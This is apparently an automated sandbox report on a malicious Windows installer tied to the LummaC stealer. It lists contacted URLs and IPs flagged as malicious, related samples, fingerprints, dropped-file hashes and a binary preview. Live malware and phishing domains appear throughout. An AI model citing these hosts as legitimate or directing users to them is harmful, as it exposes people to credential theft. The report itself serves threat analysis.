                                                                                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installsetup.exe, 00000000.00000003.1830105452.0000000003691000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsetup.exe, 00000000.00000003.1829151323.00000000036AA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829405656.00000000036A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://subca.ocsp-certum.com01F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drfalse
                                                                                                                                              		high
                                                                                                                                              https://contoso.com/powershell.exe, 00000004.00000002.2022246655.00000000063B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://sectigo.com/CPS0DF3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://dfgh.onlinepowershell.exe, 00000004.00000002.2014602281.00000000054A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://jrsoftware.org0F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://jrsoftware.org/F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://support.mozilla.org/products/firefoxgro.allsetup.exe, 00000000.00000003.1856973262.000000000378C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://klipvumisui.shop/int_clp_sha.txt~setup.exe, 00000000.00000003.2005263169.0000000000957000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2087997454.0000000000957000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                          		unknown
                                                                                                                                                          http://crl.trustwave.com/TWGCA.crl0nsetup.exe, 00000000.00000002.2078744236.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drfalse
                                                                                                                                                            		high
                                                                                                                                                            http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2022246655.00000000063B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://sectigo.com/CPS0F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://repository.certum.pl/ctnca.cer09F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icosetup.exe, 00000000.00000003.1829151323.00000000036AA000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1829405656.00000000036A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://crl.securetrust.com/TWGCSCA_L1.crl0ysetup.exe, 00000000.00000002.2078744236.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://www.certum.pl/CPS0F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://crl.certum.pl/cscasha2.crl0qF3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://aka..winsvrpowershell.exe, 00000004.00000002.2025410025.0000000007AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://cscasha2.ocsp-certum.com04F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2104859291.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000003.2097784921.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000009.00000003.2635140988.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.drfalse
                                                                                                                                                                              		high

                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                              Public IPs

                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                              104.21.32.1
                                                                                                                                                                              		learningypr.clickUnited States
                                                                                                                                                                              		13335CLOUDFLARENETUStrue
                                                                                                                                                                              185.161.251.21
                                                                                                                                                                              		cegu.shopUnited Kingdom
                                                                                                                                                                              		5089NTLGBfalse
                                                                                                                                                                              172.67.208.58
                                                                                                                                                                              		klipvumisui.shopUnited States
                                                                                                                                                                              		13335CLOUDFLARENETUSfalse

                                                                                                                                                                              General Information

                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                              Analysis ID:1582503
                                                                                                                                                                              Start date and time:2024-12-30 19:09:05 +01:00
                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                              Overall analysis duration:0h 8m 46s
                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                              Report type:full
                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                              Number of analysed new started processes analysed:38
                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                              Technologies:
                                                                                                                                                                              • HCA enabled
                                                                                                                                                                              • EGA enabled
                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                              Sample name:setup.exe
                                                                                                                                                                              Detection:MAL
                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@59/15@4/3
                                                                                                                                                                              EGA Information:
                                                                                                                                                                              • Successful, ratio: 33.3%
                                                                                                                                                                              HCA Information:Failed
                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                                                              Warnings

                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                                                                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                              • Execution Graph export aborted for target BrightLib.exe, PID 7584 because there are no executed function
                                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 7672 because it is empty
                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                              • VT rate limit hit for: setup.exe

                                                                                                                                                                              Simulations

                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                              13:10:12API Interceptor11x Sleep call for process: setup.exe modified
                                                                                                                                                                              13:10:29API Interceptor16x Sleep call for process: powershell.exe modified
                                                                                                                                                                              13:11:27API Interceptor1x Sleep call for process: BrightLib.exe modified

                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                              IPs

                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              104.21.32.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                                                              • redroomaudio.com/administrator/index.php
                                                                                                                                                                              185.161.251.21Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                  #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                    installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                      @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                        Winter.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                          MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                              !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                172.67.208.58installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                  MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      does virginia have a no chase law for motorcycles 62848.jsGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                        Domains

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        cegu.shopActive_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 185.161.251.21
                                                                                                                                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 185.161.251.21
                                                                                                                                                                                                        #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 185.161.251.21
                                                                                                                                                                                                        installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 185.161.251.21
                                                                                                                                                                                                        @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                        • 185.161.251.21
                                                                                                                                                                                                        Winter.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 185.161.251.21
                                                                                                                                                                                                        MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 185.161.251.21
                                                                                                                                                                                                        installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                        • 185.161.251.21
                                                                                                                                                                                                        !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                        • 185.161.251.21
                                                                                                                                                                                                        klipvumisui.shopActive_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 104.21.37.128
                                                                                                                                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 104.21.37.128
                                                                                                                                                                                                        #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 104.21.37.128
                                                                                                                                                                                                        installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 172.67.208.58
                                                                                                                                                                                                        @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                        • 104.21.37.128
                                                                                                                                                                                                        MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 172.67.208.58
                                                                                                                                                                                                        installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                        • 104.21.37.128
                                                                                                                                                                                                        !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                        • 104.21.37.128
                                                                                                                                                                                                        @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 172.67.208.58
                                                                                                                                                                                                        Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                        • 104.21.37.128
                                                                                                                                                                                                        learningypr.clickwinwidgetshp.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 104.21.48.1

                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        NTLGBActive_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 185.161.251.21
                                                                                                                                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 185.161.251.21
                                                                                                                                                                                                        #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 185.161.251.21
                                                                                                                                                                                                        botx.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 82.31.53.184
                                                                                                                                                                                                        botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 62.31.100.59
                                                                                                                                                                                                        loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 82.37.70.27
                                                                                                                                                                                                        loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 82.42.160.251
                                                                                                                                                                                                        loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 163.164.159.5
                                                                                                                                                                                                        sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                        • 86.17.1.166
                                                                                                                                                                                                        CLOUDFLARENETUSSharkHack.exeGet hashmaliciousLummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                        • 104.21.64.143
                                                                                                                                                                                                        Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                                        #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                                        setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.21.0.151
                                                                                                                                                                                                        https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188Get hashmaliciousKnowBe4Browse
                                                                                                                                                                                                        • 104.17.25.14
                                                                                                                                                                                                        random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 104.21.64.143
                                                                                                                                                                                                        https://tepco-jp-lin;.%5Dshop/co/tepcoGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 1.1.1.1
                                                                                                                                                                                                        https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857Get hashmaliciousKnowBe4Browse
                                                                                                                                                                                                        • 104.18.87.62
                                                                                                                                                                                                        BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                        CLOUDFLARENETUSSharkHack.exeGet hashmaliciousLummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                        • 104.21.64.143
                                                                                                                                                                                                        Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                                        #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 188.114.97.3
                                                                                                                                                                                                        setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 104.21.0.151
                                                                                                                                                                                                        https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188Get hashmaliciousKnowBe4Browse
                                                                                                                                                                                                        • 104.17.25.14
                                                                                                                                                                                                        random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 104.21.64.143
                                                                                                                                                                                                        https://tepco-jp-lin;.%5Dshop/co/tepcoGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 1.1.1.1
                                                                                                                                                                                                        https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857Get hashmaliciousKnowBe4Browse
                                                                                                                                                                                                        • 104.18.87.62
                                                                                                                                                                                                        BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                        • 172.64.41.3

                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1SharkHack.exeGet hashmaliciousLummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                        • 172.67.208.58
                                                                                                                                                                                                        • 104.21.32.1
                                                                                                                                                                                                        • 185.161.251.21
                                                                                                                                                                                                        Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 172.67.208.58
                                                                                                                                                                                                        • 104.21.32.1
                                                                                                                                                                                                        • 185.161.251.21
                                                                                                                                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 172.67.208.58
                                                                                                                                                                                                        • 104.21.32.1
                                                                                                                                                                                                        • 185.161.251.21
                                                                                                                                                                                                        #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 172.67.208.58
                                                                                                                                                                                                        • 104.21.32.1
                                                                                                                                                                                                        • 185.161.251.21
                                                                                                                                                                                                        random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 172.67.208.58
                                                                                                                                                                                                        • 104.21.32.1
                                                                                                                                                                                                        • 185.161.251.21
                                                                                                                                                                                                        UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 172.67.208.58
                                                                                                                                                                                                        • 104.21.32.1
                                                                                                                                                                                                        • 185.161.251.21
                                                                                                                                                                                                        PI1EA8P74K.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 172.67.208.58
                                                                                                                                                                                                        • 104.21.32.1
                                                                                                                                                                                                        • 185.161.251.21
                                                                                                                                                                                                        eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        • 172.67.208.58
                                                                                                                                                                                                        • 104.21.32.1
                                                                                                                                                                                                        • 185.161.251.21
                                                                                                                                                                                                        PO_KB#67897.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                        • 172.67.208.58
                                                                                                                                                                                                        • 104.21.32.1
                                                                                                                                                                                                        • 185.161.251.21
                                                                                                                                                                                                        universityform.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 172.67.208.58
                                                                                                                                                                                                        • 104.21.32.1
                                                                                                                                                                                                        • 185.161.251.21

                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exeSet-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpSet-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                                                            Entropy (8bit):1.1510207563435464
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Nlllul9kLZ:NllUG
                                                                                                                                                                                                                            MD5:087D847469EB88D02E57100D76A2E8E4
                                                                                                                                                                                                                            SHA1:A2B15CEC90C75870FDAE3FEFD9878DD172319474
                                                                                                                                                                                                                            SHA-256:81EB9A97215EB41752F6F4189343E81A0D5D7332E1646A24750D2E08B4CAE013
                                                                                                                                                                                                                            SHA-512:4682F4457C1136F84C10ACFE3BD114ACF3CCDECC1BDECC340A5A36624D93A4CB3D262B3A6DD3523C31E57C969F04903AB86BE3A2C6B07193BF08C00962B33727
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:@...e.................................,..............@..........

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2dd37f98

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                                                                                            File Type:PNG image data, 3792 x 2093, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):6447207
                                                                                                                                                                                                                            Entropy (8bit):7.998441497232368
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:196608:sXKjzP/kSY5cPYsvASGkG9166F/KHaj2M:sXKjrMSY5yPoxv/XL
                                                                                                                                                                                                                            MD5:B0CB3F07919BEB69B342ED871C6511A9
                                                                                                                                                                                                                            SHA1:C23C0B4F9810D50ECB9EA186F57325C7B41DEEBE
                                                                                                                                                                                                                            SHA-256:AB4A4A40AA1C1129150AE38AA4F939EB22B4125F6BE8F12251D7C76239B3F8F3
                                                                                                                                                                                                                            SHA-512:75BD57701CAC2BE23A9A63AE414F0E019D7C69523F93B3CE6D908B76CC382D84AB1F1C2B085633D39A8E7294C1879601A1A3B03C5871BA0E35A345F559E06AA4
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR.......-.....1S.... .IDATx..;..G....+.U={.. .....H.$..gm........1c...&.r....wm..=...-F...W....ft...Y.........~.3+.....|....?@@...o......\.._@...c....0.e..o..us).-.9~.4..:.H]..R.#M.K.!...#.s...4..G.c.#Zk.#B.s...p......R...PU....HUU..RJ.......^...Ru]..n...&w.R.WeE.DH.kB...)....!.....cRI.....d.u.....W..j..xw... .e,.....lC`....o=.^ `..d....;.nH..|k..3..}......'Ts.....D....C..h.{......$.}w.np..h.n1..U9\F..<[...J..\..............c..f.6.g.o......$.1..^z)..8..c$./.|3...s.9..&.|...r....L.q..I~{)..>.uw..oY.d../..ksw..P..p.]....T.K1.R..i.........I.9B.....D@@@..a/.?.[ 8.K|......H..X..T...4.{..c..4..!.^...}X~7.'......uc.$H................|.{5...Q...,..{..p..]v{....m.]).....[-.{..... !l......V..W k....u....g...$....[%>^.oI.|.......$.......$.g.@...m.hI~S;.).=...K%..H.T..d"....W.O.J.A..../%..@..J..-...ZW........oz....b.....B..x.1......>q.....[..I>..l...t..I..I..n....s....P..p...C..3..|.(..<..3r.F7d.#..;..".p..dg.p.#4Mm........}.....A.......

